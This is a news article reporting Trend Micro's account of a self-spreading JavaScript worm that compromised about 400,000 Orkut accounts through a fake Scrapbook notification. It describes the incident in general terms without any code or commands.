14 DAY TRIAL // Google's social network Orkut has suffered what seems to be the most dangerous attack these days, as no less than 400,000 accounts have been compromised. Alice Decker of Trend Micro today reported that numerous Orkut registered users received a malicious email informing them that a new Scrapbook entry was added. Obviously, the email included a link which was supposed to get them to the new message. Clicking the URL would open a page displaying the following message: "2008 vem ai� que ele comece mto bem para vc."
And this is the moment when the entire fuss gets started. According to the Trend Micro official, the accounts were compromised as soon as the user clicked on the malicious link. Just after the above message had been displayed, it deleted itself and added the victim to the "Infectados pelo Virus do Orkut" network.
Moreover, "it then downloads and executes a heavily obfuscated Javascript which in turns sends a copy of the original Scrapbook post to all of the users Orkut Contact's, so that they too will be infected by the threat. At last count the group had over 400,000 users who had been infected", Alice Decker wrote.
The description of the Orkut community hosting the affected users states that no files or data have been compromised, because the attacker attempted to prove that Google's social network can easily turn into a real web threat. And all this happens with a simple click to read the entries added in the Scrapbook.
At this time, the exploit is not available anymore as the attacker removed the Javascript from the web. "It appears from both the script which we have analysed, and this description that this script was designed purely to spread, rather than for more malicious purposes normally associated with this type of attack. The author has since pulled the malicious Javascript from the web, having apparently gotten his point across", the Trend Micro expert continued.
Although this type of attacks can easily become dangerous, they may be somehow useful, because they reveal vulnerabilities in web services, which could let other dangerous people play with people's computers. Just take today's example. What if the attacker replaced the JavaScript with a more dangerous infection to gain remote control over the affected computers?